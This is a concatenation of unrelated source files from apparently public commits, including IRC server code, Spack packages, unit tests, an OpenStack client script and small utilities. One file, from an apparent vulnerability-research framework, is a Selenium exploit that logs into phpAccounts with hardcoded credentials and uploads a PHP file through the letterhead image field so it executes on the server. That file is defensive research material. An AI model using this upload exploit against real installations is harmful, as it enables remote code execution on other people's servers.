# :authors: Isis Lovecruft 0xA3ADB67A2CDB8B35 <isis@torproject.org>
# please also see AUTHORS file
# :copyright: (c) 2013, Isis Lovecruft
# (c) 2007-2013, The Tor Project, Inc.
# (c) 2007-2013, all entities within the AUTHORS file
# :license: 3-Clause BSD, see LICENSE for licensing information
"""Unittests for :mod:`bridgedb.crypto`."""
from __future__ import print_function
from __future__ import unicode_literals
import os
from twisted.trial import unittest
from bridgedb import crypto
SEKRIT_KEY = b'v\x16Xm\xfc\x1b}\x063\x85\xaa\xa5\xf9\xad\x18\xb2P\x93\xc6k\xf9'
SEKRIT_KEY += b'\x8bI\xd9\xb8xw\xf5\xec\x1b\x7f\xa8'
class CryptoTest(unittest.TestCase):
def test_getKey_nokey(self):
"""Test retrieving the secret_key from an empty file."""
filename = os.path.join(os.getcwd(), 'sekrit')
key = crypto.getKey(filename)
self.failUnlessIsInstance(key, basestring,
"key isn't a string! type=%r" % type(key))
def test_getKey_tmpfile(self):
"""Test retrieving the secret_key from a new tmpfile."""
filename = self.mktemp()
key = crypto.getKey(filename)
self.failUnlessIsInstance(key, basestring,
"key isn't a string! type=%r" % type(key))
def test_getKey_keyexists(self):
"""Write the example key to a file and test reading it back."""
filename = self.mktemp()
with open(filename, 'wb') as fh:
fh.write(SEKRIT_KEY)
fh.flush()
key = crypto.getKey(filename)
self.failUnlessIsInstance(key, basestring,
"key isn't a string! type=%r" % type(key))
self.assertEqual(SEKRIT_KEY, key,
"""The example key and the one read from file differ!
key (in hex): %s
SEKRIT_KEY (in hex): %s"""
% (key.encode('hex'), SEKRIT_KEY.encode('hex')))
| bsd-3-clause | Python |
|
8373de2daf5c44c069b9312ad3a3b21e2f5c21e3 | Implement channel mode +l | ElementalAlchemist/txircd,Heufneutje/txircd,DesertBus/txircd | txircd/modules/cmode_l.py | txircd/modules/cmode_l.py | from twisted.words.protocols import irc
from txircd.modbase import Mode
class LimitMode(Mode):
def checkSet(self, user, target, param):
intParam = int(param)
if str(intParam) != param:
return False
return (intParam >= 0)
def commandPermission(self, user, cmd, data):
if cmd != "JOIN":
return data
targetChannels = data["targetchan"]
keys = data["keys"]
removeChannels = []
for channel in targetChannels:
if "l" in channel.mode and len(channel.users) >= int(channel.mode["l"]):
user.sendMessage(irc.ERR_CHANNELISFULL, channel.name, ":Cannot join channel (Channel is full)")
removeChannels.append(channel)
for channel in removeChannels:
index = targetChannels.index(channel)
targetChannels.pop(index)
keys.pop(index)
data["targetchan"] = targetChannels
data["keys"] = keys
return data
class Spawner(object):
def __init__(self, ircd):
self.ircd = ircd
def spawn(self):
return {
"modes": {
"cpl": LimitMode()
}
}
def cleanup(self):
self.ircd.removeMode("cpl") | bsd-3-clause | Python |
|
a24844a20634354167511163870438c36581c656 | Add py-hpack (#19189) | LLNL/spack,LLNL/spack,iulian787/spack,LLNL/spack,iulian787/spack,LLNL/spack,LLNL/spack,iulian787/spack,iulian787/spack,iulian787/spack | var/spack/repos/builtin/packages/py-hpack/package.py | var/spack/repos/builtin/packages/py-hpack/package.py | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PyHpack(PythonPackage):
"""Pure-Python HPACK header compression"""
homepage = "https://github.com/python-hyper/hpack"
url = "https://pypi.io/packages/source/h/hpack/hpack-4.0.0.tar.gz"
version('4.0.0', sha256='fc41de0c63e687ebffde81187a948221294896f6bdc0ae2312708df339430095')
depends_on('py-setuptools', type='build')
depends_on('py-wheel', type='build')
| lgpl-2.1 | Python |
|
5ed57df8d1e3b85bc27d5a834c9ec35b18055ba9 | Create codility.py | maxmedina05/gossip-algo,maxmedina05/gossip-algo,maxmedina05/gossip-algo | codility.py | codility.py | #lesson 1
def solution(N):
bstr = dectoBin(N)
arr = []
cnt = 0
for b in bstr:
if b == '0':
cnt = cnt + 1
if b != '0':
arr.append(cnt)
cnt = 0
return getMax(arr)
def dectoBin(N):
bstr = ""
while N > 0:
bstr = str(N % 2) + bstr
N = N // 2
return bstr
def getMax(arr):
max = arr[0]
for i in range(len(arr)):
if arr[i] > max:
max = arr[i]
return max
solution(0)
| mit | Python |
|
955bca3beb7808636a586bed43c37e5f74fba17f | Add Weather class (use forecastio, geopy) - forecase(current/daily) | DongjunLee/kino-bot | kino/functions/weather.py | kino/functions/weather.py | # -*- coding: utf-8 -*-
import datetime
import forecastio
from geopy.geocoders import GoogleV3
from kino.template import MsgTemplate
from slack.slackbot import SlackerAdapter
from utils.config import Config
class Weather(object):
def __init__(self):
self.config = Config()
self.slackbot = SlackerAdapter()
self.template = MsgTemplate()
geolocator = GoogleV3()
self.location = geolocator.geocode(self.config.weather["HOME"])
api_key = self.config.weather["DARK_SKY_SECRET_KEY"]
lat = self.location.latitude
lon = self.location.longitude
self.forecastio = forecastio.load_forecast(api_key, lat, lon)
def read(self, when='current'):
if when == 'current':
self.__current_forecast()
elif when == 'daily':
self.__daily_forecast()
def __daily_forecast(self):
daily = self.forecastio.daily()
address = self.location.address
icon = daily.icon
summary = daily.summary
attachments = self.template.make_weather_template(address, icon, summary)
self.slackbot.send_message(attachments=attachments)
def __current_forecast(self):
current = self.forecastio.currently()
address = self.location.address
icon = current.icon
summary = current.summary
temperature = current.temperature
attachments = self.template.make_weather_template(address, icon, summary, temperature=temperature)
self.slackbot.send_message(attachments=attachments)
| mit | Python |
|
1005f983774392306ca10e5fb12b59eeb63a88c4 | add remote file inclusion exploit | UMD-SEAM/bugbox,UMD-SEAM/bugbox,UMD-SEAM/bugbox,UMD-SEAM/bugbox,UMD-SEAM/bugbox,UMD-SEAM/bugbox,UMD-SEAM/bugbox | framework/Exploits/OSVDB_82707_D.py | framework/Exploits/OSVDB_82707_D.py |
# Copyright 2013 University of Maryland. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE.TXT file.
import framework
import time
import selenium.common.exceptions
class Exploit (framework.Exploit):
attributes = {'Name' : "OSVDB_82707D",
'Description' : "Upload and exec of php file using Letterhead img uplaod feature",
'References' : [['OSVDB','82707'],['http://www.osvdb.org/show/osvdb/82707']],
'Target' : "phpAccounts 0.5.3",
'TargetLicense' : '',
'Type' : "EXEC",
'VulWikiPage' : "",
'Privileged' : True
}
def __init__(self, visible=False):
framework.Exploit.__init__(self, visible)
return
def setup(self, target_system_dir):
self.logger.info("Creating payload file")
fd = file("/tmp/phpinfoexploit.php", 'w')
fd.write("<?php\nphpinfo();\n?>")
fd.close()
return
def exploit(self):
driver = self.create_selenium_driver()
driver.get("http://127.0.0.1/phpaccounts/index.php")
driver.get_element(by_xpath="//input[@name='Login_Username']").send_keys("phpaccounts@umd.edu")
driver.get_element(by_xpath="//input[@name='Login_Password']").send_keys("phpaccountspw21")
driver.get_element(by_xpath="//input[@value='Login']").click()
driver.get_element(by_xpath="//frame[@name='leftFrame']")
driver.get("http://127.0.0.1//phpaccounts/index.php?page=tasks&action=preferences")
driver.get_element(by_xpath="//input[@name='letterhead_image']").send_keys("/tmp/phpinfoexploit.php")
driver.get_element(by_xpath="//input[@value='Save Changes']").click()
driver.cleanup()
return
def verify(self):
driver = self.create_selenium_driver()
driver.get("http://127.0.0.1/phpaccounts/users/1/phpinfoexploit.php")
try:
driver.get_element(by_xpath="//a[@href='http://www.php.net/']")
driver.cleanup()
self.logger.info("Payload executed")
return True
except selenium.common.exceptions.NoSuchElementException:
self.logger.error("Payload failed to execute")
driver.cleanup()
return False
| bsd-3-clause | Python |
|
2c1b393c347ffcf24d9584be800378a1b77fa86d | add example to test error handling | JohnLunzer/flexx,zoofIO/flexx,jrversteegh/flexx,JohnLunzer/flexx,zoofIO/flexx,JohnLunzer/flexx,jrversteegh/flexx | flexx/ui/examples/errors.py | flexx/ui/examples/errors.py | """
App that can be used to generate errors on the Python and JS side. These
errors should show tracebacks in the correct manner (and not crash the app
as in #164).
To test thoroughly, you should probably also set the foo and bar
properties from the Python and JS console.
"""
from flexx import app, event, ui
class Errors(ui.Widget):
def init(self):
with ui.VBox():
self.b1 = ui.Button(text='Raise error in JS property setter')
self.b2 = ui.Button(text='Raise error in JS event handler')
self.b3 = ui.Button(text='Raise error in Python property setter')
self.b4 = ui.Button(text='Raise error in Python event handler')
ui.Widget(flex=1) # spacer
class Both:
@event.prop
def foo(self, v=1):
return self.reciprocal(v)
def reciprocal(self, v):
return 1 / v
def raise_error(self):
raise RuntimeError('Deliberate error')
class JS:
@event.prop
def bar(self, v):
self.raise_error()
# Handlers for four buttons
@event.connect('b1.mouse_click')
def error_in_JS_prop(self, *events):
self.bar = 2
@event.connect('b2.mouse_click')
def error_in_JS_handler(self, *events):
self.raise_error()
@event.connect('b3.mouse_click')
def error_in_Py_prop(self, *events):
self.foo = 0
@event.connect('b4.mouse_click')
def error_in_Py_handler(self, *events):
self.raise_error()
if __name__ == '__main__':
m = app.launch(Errors)
app.run()
| bsd-2-clause | Python |
|
331308eedd37628f5419001fc48fc5a328c1bab9 | Add test_jsc | orezpraw/unnaturalcode,naturalness/unnaturalcode,naturalness/unnaturalcode,naturalness/unnaturalcode,naturalness/unnaturalcode,orezpraw/unnaturalcode,naturalness/unnaturalcode,naturalness/unnaturalcode,orezpraw/unnaturalcode,orezpraw/unnaturalcode,naturalness/unnaturalcode,orezpraw/unnaturalcode,orezpraw/unnaturalcode,orezpraw/unnaturalcode | unnaturalcode/test_jsc.py | unnaturalcode/test_jsc.py | #!/usr/bin/python
# Copyright 2017 Dhvani Patel
#
# This file is part of UnnaturalCode.
#
# UnnaturalCode is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# UnnaturalCode is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with UnnaturalCode. If not, see <http://www.gnu.org/licenses/>.
from check_jsc_syntax import checkJSCSyntax
from compile_error import CompileError
import unittest
ERROR_TEST = """if (process.argv.length < 3)
console.error("not enough args");
process.exit(1);
}
"""
class TestStringMethods(unittest.TestCase):
def test_syntax_ok(self):
toTest = checkJSCSyntax('a=1+2')
self.assertTrue(toTest is None)
def test_syntax_error(self):
toTest = checkJSCSyntax(ERROR_TEST)
self.assertTrue(isinstance (toTest[0], CompileError))
self.assertEqual(toTest[0].filename, 'toCheck.js')
self.assertEqual(toTest[0].line, 4)
self.assertEqual(toTest[0].column, None)
self.assertEqual(toTest[0].functionname, None)
self.assertEqual(toTest[0].text, 'Parser error')
self.assertEqual(toTest[0].errorname, 'SyntaxError')
if __name__ == '__main__':
unittest.main()
| agpl-3.0 | Python |
|
a6495a05d4652beeefca9e383f5dd7b8fc4246d7 | Create simple_fun_91:unique_digit_products.py | Orange9000/Codewars,Orange9000/Codewars | Solutions/simple_fun_91:unique_digit_products.py | Solutions/simple_fun_91:unique_digit_products.py | from operator import mul
def unique_digit_products(a):
return len({reduce(mul, map(int, str(x))) for x in a})
| mit | Python |
|
371545ecae0296f9274319c971be1378c3dafbbe | Add migration | theirc/ServiceInfo,theirc/ServiceInfo,theirc/ServiceInfo,theirc/ServiceInfo,theirc/ServiceInfo-ircdeploy | services/migrations/0036_auto_20150327_1434.py | services/migrations/0036_auto_20150327_1434.py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('services', '0035_auto_20150325_1637'),
]
operations = [
migrations.AddField(
model_name='jiraupdaterecord',
name='feedback',
field=models.ForeignKey(to='services.Feedback', null=True, related_name='jira_records', blank=True),
preserve_default=True,
),
migrations.AlterField(
model_name='jiraupdaterecord',
name='update_type',
field=models.CharField(max_length=22, choices=[('provider-change', 'Provider updated their information'), ('new-service', 'New service submitted by provider'), ('change-service', 'Change to existing service submitted by provider'), ('cancel-draft-service', 'Provider canceled a draft service'), ('cancel-current-service', 'Provider canceled a current service'), ('superseded-draft', 'Provider superseded a previous draft'), ('approve-service', 'Staff approved a new or changed service'), ('rejected-service', 'Staff rejected a new or changed service'), ('feedback', 'User submitted feedback')], verbose_name='update type'),
preserve_default=True,
),
]
| bsd-3-clause | Python |
|
7d061e698788a60f0e3b59559961408015d891ed | Add first iteration of message_producer | jdgillespie91/trackerSpend,jdgillespie91/trackerSpend | utils/message_producer.py | utils/message_producer.py | import argparse
import pika
def send_message(queue, body=None):
"""
Sends a message to the specified queue with specified body if applicable.
:param queue: Name of queue.
:type queue: str
:param body: Content of message body in the form "{'key': 'value'}".
:type body: str
"""
connection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))
channel = connection.channel()
channel.queue_declare(queue=queue)
channel.basic_publish(exchange='', routing_key=queue, body=body)
print(" [x] Message sent.")
print(" Queue: {0}".format(queue))
print(" Body: {0}".format(body))
connection.close()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Send a message to the '
'specified queue.')
parser.add_argument('-q', '--queue', required=True,
help='The destination of the message')
parser.add_argument('-b', '--body', help='The message body, if applicable.')
args = parser.parse_args()
send_message(args.queue, args.body) | mit | Python |
|
49614576524e74cb2e8eaa6656c1e86bf546c8e6 | Create keystone_test.py | OpenAcademy-OpenStack/DorisXue | keystone_test.py | keystone_test.py | import keystoneclient.v2_0.client as ksclient
import novaclient.v1_1.client as nvclient
from novaclient import client as novaclient
import glanceclient
import os
def get_keystone_creds():
d = {}
d['username'] = 'admin'
d['password'] = 'password'
d['auth_url'] = 'http://10.0.2.15:5000/v2.0/'
d['tenant_name'] = 'demo'
return d
def get_nova_creds():
d = {}
d['username'] = 'admin'
d['api_key'] = 'password'
d['auth_url'] = 'http://10.0.2.15:5000/v2.0/'
d['project_id'] = 'demo'
return d
if __name__== "__main__":
keystone_creds = get_keystone_creds()
keystone = ksclient.Client(**keystone_creds)
nova_creds = get_nova_creds()
nova = nvclient.Client(**nova_creds)
#if not nova.keypairs.findall(name="mykey"):
# with open(os.path.expanduser('~/.ssh/id_rsa.pub')) as fpubkey:
# nova.keypairs.create(name="mykey", public_key=fpubkey.read())
glance_endpoint = keystone.service_catalog.url_for(service_type='image',
endpoint_type='publicURL')
glance = glanceclient.Client('1',glance_endpoint, token=keystone.auth_token)
images = glance.images.list()
for one_image in images:
if one_image.name.find('ubuntu') > -1:
print one_image.name
image = nova.images.find(name=one_image.name)
flavor = nova.flavors.find(name="m1.small")
instance = nova.servers.create(name=one_image.name, image=image, flavor=flavor)
#instance = nova.servers.create(name=one_image.name, image=image, flavor=flavor, key_name="mykey")
| apache-2.0 | Python |
|
6789f2ea1862f4c30e8d60bd0b47640b7e5835c1 | Add script to count labels in a data set | NLeSC/embodied-emotions-scripts,NLeSC/embodied-emotions-scripts | count_labels.py | count_labels.py | """Count HEEM labels in data set.
Usage: python count_labels.py <dir with train and test files>
"""
import codecs
from glob import glob
import numpy as np
import argparse
from collections import Counter
def load_data(data_file):
data = [ln.rsplit(None, 1) for ln in open(data_file)]
X_data, Y_data = zip(*data)
return X_data, Y_data
def count_labels(file_name, counter):
# load data set
X_data, Y_data = load_data(file_name)
Y = [s.split('_') for s in Y_data]
for labelset in Y:
counter.update(labelset)
del counter['None']
return counter
parser = argparse.ArgumentParser()
parser.add_argument('input_dir', help='the directory where the input text '
'files can be found.')
args = parser.parse_args()
train_file = '{}/train_1.txt'.format(args.input_dir)
test_file = '{}/test_1.txt'.format(args.input_dir)
labels = Counter()
labels = count_labels(train_file, labels)
labels = count_labels(test_file, labels)
for l, freq in labels.most_common():
print '{}\t{}'.format(l, freq)
| apache-2.0 | Python |
|
f1e08341a6b9f8bf137c1642debe3d3eda4b2cdf | Add utility to load env from config file | cancerregulome/gidget,cancerregulome/gidget,cancerregulome/gidget | gidget/util/load_path_config.py | gidget/util/load_path_config.py | #!/usr/bin/env python
import os
from os.path import join as pthJoin
from ConfigParser import SafeConfigParser
import sys
from pipeline_util import expandPath as pthExpanded
COMMANDS_DIR = 'commands'
# mini spec that maps from config lines to gidget env var names
# [ (section, [ (option_name, env_name) ] ) ]
optionMap = [
('maf', [
('TCGAMAF_OUTPUTS', 'TCGAMAF_OUTPUTS'),
('TCGAMAF_DATA_DIR', 'TCGAMAF_DATA_DIR'),
('TCGAMAF_REFERENCES_DIR', 'TCGAMAF_REFERENCES_DIR'),
]),
('binarization', [
('TCGABINARIZATION_DATABASE_DIR','TCGABINARIZATION_DATABASE_DIR'),
('TCGABINARIZATION_REFERENCES_DIR', 'TCGABINARIZATION_REFERENCES_DIR'),
]),
('fmp', [
('TCGAFMP_PYTHON3', 'TCGAFMP_PYTHON3'),
('TCGAFMP_BIOINFORMATICS_REFERENCES', 'TCGAFMP_BIOINFORMATICS_REFERENCES'),
('TCGAFMP_SCRATCH', 'TCGAFMP_SCRATCH'),
('TCGAFMP_DCC_REPOSITORIES', 'TCGAFMP_DCC_REPOSITORIES'),
('TCGAFMP_FIREHOSE_MIRROR', 'TCGAFMP_FIREHOSE_MIRROR'),
('TCGAFMP_PAIRWISE_ROOT', 'TCGAFMP_PAIRWISE_ROOT'),
('TCGAFMP_LOCAL_SCRATCH', 'TCGAFMP_LOCAL_SCRATCH'),
('TCGAFMP_CLUSTER_SCRATCH', 'TCGAFMP_CLUSTER_SCRATCH'),
('TCGAFMP_CLUSTER_HOME', 'TCGAFMP_CLUSTER_HOME'),
]),
('python', [
('TCGAMAF_PYTHON_BINARY', 'TCGAMAF_PYTHON_BINARY'),
]),
('tools', [
('TCGAMAF_TOOLS_DIR', 'TCGAMAF_TOOLS_DIR'),
('LD_LIBRARY_PATH', 'LD_LIBRARY_PATH'),
])]
# pth = path
# pthd = path to a directory
# apth = absolute path
def envFromConfigOrOs(pthConfig):
    """Return the gidget environment mapping.

    Falls back to the live process environment when no config path is
    supplied; otherwise builds the env dict from the config file.
    """
    if pthConfig is None:
        return os.environ
    return envFromConfig(pthConfig)
def envFromConfig(pthConfig):
    """Build the gidget environment dict from the ini-style config at ``pthConfig``.

    Derives the source-tree layout from GIDGET_SOURCE_ROOT, extends
    ``sys.path``/PYTHONPATH with the gidget utility directories, and copies
    every mapped option into ``os.environ`` so subprocesses inherit it.
    ``optionMap`` (module level) maps config sections/options to env names.
    """
    parser = SafeConfigParser()
    parser.read(pthConfig)
    env = {}
    pthdGidgetRoot = pthExpanded(parser.get('gidget', 'GIDGET_SOURCE_ROOT'))
    pthdFmpRoot = pthJoin(pthdGidgetRoot, COMMANDS_DIR, 'feature_matrix_construction')
    pthdMafRoot = pthJoin(pthdGidgetRoot, COMMANDS_DIR, 'maf_processing')
    pthdMafScripts = pthdMafRoot
    env['GIDGET_SOURCE_ROOT'] = pthdGidgetRoot
    env['TCGAFMP_ROOT_DIR'] = pthdFmpRoot
    env['TCGAMAF_ROOT_DIR'] = pthdMafRoot
    env['TCGAMAF_SCRIPTS_DIR'] = pthdMafScripts
    rgpthdAddToPypath = (
        pthJoin(pthdGidgetRoot, 'gidget', 'util'),
        pthJoin(pthdMafRoot, 'python'),
        pthJoin(pthdFmpRoot, 'util'))
    # BUG FIX: sys.path.append(rgpthdAddToPypath) inserted the tuple itself
    # as a single useless entry; extend() adds each directory individually.
    sys.path.extend(rgpthdAddToPypath)
    # Also prepend to PYTHONPATH so the paths propagate to subprocesses.
    env['PYTHONPATH'] = ('%s:' * len(rgpthdAddToPypath)) % rgpthdAddToPypath + os.environ['PYTHONPATH']
    for section in optionMap:
        stSection = section[0]
        options = section[1]
        for option in options:
            stOption = option[0]
            stEnv = option[1]
            pthOption = pthExpanded(parser.get(stSection, stOption))
            env[stEnv] = pthOption
            # Export as well, so child processes see the same value.
            os.environ[stEnv] = pthOption
return env | mit | Python |
|
2c4a2368d2dc1c6ee910358fedd6e85cdf4f043a | Add test from jasmine-core | jasmine/jasmine-py,jasmine/jasmine-py,jasmine/jasmine-py | test/jasmine_core_test.py | test/jasmine_core_test.py | from pytest import raises
import pytest
import subprocess
from jasmine_core import Core
import os
import pkg_resources
notwin32 = pytest.mark.skipif("sys.platform == 'win32'")
@notwin32
def test_js_files():
    # Core.js_files() should list the bundled jasmine JS assets, in load
    # order. Skipped on win32 (see the notwin32 marker defined above).
    files = [
        'jasmine.js',
        'jasmine-html.js',
        'json2.js',
        'boot.js'
    ]
    assert Core.js_files() == files
def test_css_files():
    """Core.css_files() should list the css files relative to Core.path()."""
    assert Core.css_files() == ['jasmine.css']
# The favicon image shipped inside the jasmine_core package must exist on disk.
def test_favicon():
    assert os.path.isfile(pkg_resources.resource_filename('jasmine_core.images', 'jasmine_favicon.png')) | mit | Python |
|
7b5b4fdf8d5801d6e87d1b39f46a5f868aa07110 | Add test | cupy/cupy,cupy/cupy,cupy/cupy,cupy/cupy | tests/cupy_tests/test_typing.py | tests/cupy_tests/test_typing.py | import cupy
class TestClassGetItem:
    """Regression test: cupy.ndarray must be subscriptable as a class."""

    def test_class_getitem(self):
        # Subscripting the class itself (__class_getitem__) must not raise;
        # only evaluation matters here, the result is discarded.
        from typing import Any
        cupy.ndarray[Any, Any]
| mit | Python |
|
a9609a500a65cc0efb787f5d90e164bd6fa48c1a | Print the left view of a BST | arunkumarpalaniappan/algorithm_tryouts | leftViewofBST.py | leftViewofBST.py | class BST:
def __init__(self,val):
self.left = None
self.right = None
self.data = val
def insertToBst(root, value):
    """Link node ``value`` into its BST position under ``root``.

    Values smaller than a node go left; everything else (including
    duplicates) goes right.  When ``root`` is None there is no tree to
    link into, so the call has no caller-visible effect (the original's
    local rebinding of ``root`` was equally invisible to the caller).
    """
    if root is None:
        return
    node = root
    while True:
        if value.data < node.data:
            if node.left is None:
                node.left = value
                return
            node = node.left
        else:
            if node.right is None:
                node.right = value
                return
            node = node.right
def leftView(root, level, currentLevel):
    """Print the left view of the tree: the first node seen at each depth.

    Pre-order traversal that visits left before right guarantees the first
    node reached at a new depth is the leftmost one on that level.

    root         -- current node, or None
    level        -- depth of ``root`` (the tree root is level 1)
    currentLevel -- one-item list holding the deepest level printed so far;
                    a list so the value is shared across recursive calls
    """
    if not root:
        return
    if currentLevel[0] < level:
        # First visit to this depth: this is the leftmost node.
        # print() is valid on both Python 2 and 3; the original
        # ``print root.data`` statement was Python-2 only.
        print(root.data)
        currentLevel[0] = level
    leftView(root.left, level + 1, currentLevel)
    leftView(root.right, level + 1, currentLevel)
# Demo: build a sample BST and print its left view.
# Insert order 5,4,6,2,1,7,8,9,10 produces a left spine 5-4-2-1 and a
# long right chain 6-7-8-9-10, so the first node per level is 5,4,2,1,9,10.
tree = BST(5)
insertToBst(tree, BST(4))
insertToBst(tree, BST(6))
insertToBst(tree, BST(2))
insertToBst(tree, BST(1))
insertToBst(tree, BST(7))
insertToBst(tree, BST(8))
insertToBst(tree, BST(9))
insertToBst(tree, BST(10))
leftView(tree, 1, [0]) # => 5,4,2,1,9,10 ,O(n)
| mit | Python |
|
08e7103766ce684e849f23fac77792876fded586 | fix helper to use the actual lines form ceph.conf | guits/ceph-ansible,travmi/ceph-ansible,albertomurillo/ceph-ansible,jsaintrocc/ceph-ansible,WingkaiHo/ceph-ansible,albertomurillo/ceph-ansible,travmi/ceph-ansible,WingkaiHo/ceph-ansible,bengland2/ceph-ansible,fgal/ceph-ansible,guits/ceph-ansible,jsaintrocc/ceph-ansible,font/ceph-ansible,jtaleric/ceph-ansible,fgal/ceph-ansible,bengland2/ceph-ansible,font/ceph-ansible,ceph/ceph-ansible,jtaleric/ceph-ansible,ceph/ceph-ansible,WingkaiHo/ceph-ansible,albertomurillo/ceph-ansible | tests/functional/tests/mon/test_initial_members.py | tests/functional/tests/mon/test_initial_members.py | import pytest
uses_mon_initial_members = pytest.mark.skipif(
'mon_initial_members' not in pytest.config.slaveinput['node_config']['components'],
reason="only run in monitors configured with initial_members"
)
class TestMon(object):
    """Checks the rendered ceph.conf on monitors deployed with
    ``mon_initial_members`` (see the module-level skipif marker)."""

    def get_line_from_config(self, string, conf_path):
        # Return the first line of the file that contains `string`
        # (trailing newline included); implicitly returns None when
        # no line matches.
        with open(conf_path) as ceph_conf:
            ceph_conf_lines = ceph_conf.readlines()
            for line in ceph_conf_lines:
                if string in line:
                    return line

    @uses_mon_initial_members
    def test_ceph_config_has_inital_members_line(self, scenario_config):
        # The cluster name (default 'ceph') names the rendered conf file.
        cluster_name = scenario_config.get('ceph', {}).get('cluster_name', 'ceph')
        ceph_conf_path = '/etc/ceph/%s.conf' % cluster_name
        initial_members_line = self.get_line_from_config('mon initial members', ceph_conf_path)
        assert initial_members_line

    @uses_mon_initial_members
    def test_initial_members_line_has_correct_value(self, scenario_config):
        cluster_name = scenario_config.get('ceph', {}).get('cluster_name', 'ceph')
        ceph_conf_path = '/etc/ceph/%s.conf' % cluster_name
        initial_members_line = self.get_line_from_config('mon initial members', ceph_conf_path)
        # NOTE(review): readlines() keeps '\n', so this equality only holds
        # when the matched line is the file's final, newline-less line --
        # confirm against the generated ceph.conf.
        assert initial_members_line == 'mon initial members = mon0'
assert initial_members_line == 'mon initial members = mon0'
| import pytest
uses_mon_initial_members = pytest.mark.skipif(
'mon_initial_members' not in pytest.config.slaveinput['node_config']['components'],
reason="only run in monitors configured with initial_members"
)
class TestMon(object):
def get_line_from_config(self, string, conf_path):
with open(conf_path) as ceph_conf:
ceph_conf_lines = ceph_conf.readlines()
for line in ceph_conf:
if string in line:
return line
@uses_mon_initial_members
def test_ceph_config_has_inital_members_line(self, scenario_config):
cluster_name = scenario_config.get('ceph', {}).get('cluster_name', 'ceph')
ceph_conf_path = '/etc/ceph/%s.conf' % cluster_name
initial_members_line = self.get_line_from_config('mon_initial_members', ceph_conf_path)
assert initial_members_line
@uses_mon_initial_members
def test_initial_members_line_has_correct_value(self, scenario_config):
cluster_name = scenario_config.get('ceph', {}).get('cluster_name', 'ceph')
ceph_conf_path = '/etc/ceph/%s.conf' % cluster_name
initial_members_line = self.get_line_from_config('mon_initial_members', ceph_conf_path)
assert initial_members_line == 'mon_initial_members = mon0'
| apache-2.0 | Python |
5fad9d4fb60eb29d04d8d6a7fd967aad67ca28e2 | Create __init__.py | sheepeatingtaz/django-pagination-bootstrap,sheepeatingtaz/django-pagination-bootstrap,staticdev/django-pagination-bootstrap,staticdev/django-pagination-bootstrap | pagination_bootstrap/__init__.py | pagination_bootstrap/__init__.py | mit | Python |
||
379d2953c90610a48eb80d1cabedb63b8f948813 | Use `for_app` helper | scorphus/thefuck,mlk/thefuck,Clpsplug/thefuck,nvbn/thefuck,Clpsplug/thefuck,SimenB/thefuck,SimenB/thefuck,mlk/thefuck,scorphus/thefuck,nvbn/thefuck | thefuck/rules/fab_command_not_found.py | thefuck/rules/fab_command_not_found.py | from thefuck.utils import eager, get_closest, for_app
@for_app('fab')
def match(command):
    """Trigger only when a ``fab`` invocation reported unknown task names."""
    return 'Warning: Command(s) not found:' in command.stderr
# We need different behavior than in get_all_matched_commands.
@eager
def _get_between(content, start, end=None):
    """Yield the first token of every non-empty line of ``content`` that
    appears after a line containing ``start`` and (when ``end`` is given)
    before the first line containing ``end``."""
    should_yield = False
    for line in content.split('\n'):
        if start in line:
            # Start marker itself is not yielded.
            should_yield = True
            continue
        if end and end in line:
            return
        if should_yield and line:
            yield line.strip().split(' ')[0]
def get_new_command(command):
    """Replace each unknown fab task in the command line with the closest
    match from fab's 'Available commands:' listing."""
    not_found_commands = _get_between(
        command.stderr, 'Warning: Command(s) not found:', 'Available commands:')
    possible_commands = _get_between(
        command.stdout, 'Available commands:')
    script = command.script
    for not_found in not_found_commands:
        # NOTE(review): @eager presumably materializes _get_between into a
        # list, so possible_commands survives repeated use here -- verify.
        fix = get_closest(not_found, possible_commands)
        # Leading space anchors the replacement to a whole argument.
        script = script.replace(' {}'.format(not_found),
                                ' {}'.format(fix))
    return script
| from thefuck.utils import eager, get_closest
def match(command):
return (command.script_parts[0] == 'fab'
and 'Warning: Command(s) not found:' in command.stderr)
# We need different behavior then in get_all_matched_commands.
@eager
def _get_between(content, start, end=None):
should_yield = False
for line in content.split('\n'):
if start in line:
should_yield = True
continue
if end and end in line:
return
if should_yield and line:
yield line.strip().split(' ')[0]
def get_new_command(command):
not_found_commands = _get_between(
command.stderr, 'Warning: Command(s) not found:', 'Available commands:')
possible_commands = _get_between(
command.stdout, 'Available commands:')
script = command.script
for not_found in not_found_commands:
fix = get_closest(not_found, possible_commands)
script = script.replace(' {}'.format(not_found),
' {}'.format(fix))
return script
| mit | Python |
df777bf0771fdd8aadfbb26fe13b51692f4c161d | Add autogen package (#3542) | LLNL/spack,iulian787/spack,iulian787/spack,LLNL/spack,lgarren/spack,tmerrick1/spack,skosukhin/spack,EmreAtes/spack,TheTimmy/spack,matthiasdiener/spack,iulian787/spack,tmerrick1/spack,matthiasdiener/spack,TheTimmy/spack,mfherbst/spack,TheTimmy/spack,tmerrick1/spack,EmreAtes/spack,EmreAtes/spack,matthiasdiener/spack,iulian787/spack,skosukhin/spack,tmerrick1/spack,mfherbst/spack,skosukhin/spack,krafczyk/spack,TheTimmy/spack,mfherbst/spack,matthiasdiener/spack,TheTimmy/spack,krafczyk/spack,lgarren/spack,lgarren/spack,tmerrick1/spack,lgarren/spack,skosukhin/spack,skosukhin/spack,matthiasdiener/spack,lgarren/spack,LLNL/spack,LLNL/spack,krafczyk/spack,EmreAtes/spack,LLNL/spack,krafczyk/spack,EmreAtes/spack,iulian787/spack,mfherbst/spack,mfherbst/spack,krafczyk/spack | var/spack/repos/builtin/packages/autogen/package.py | var/spack/repos/builtin/packages/autogen/package.py | ##############################################################################
# Copyright (c) 2013-2016, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
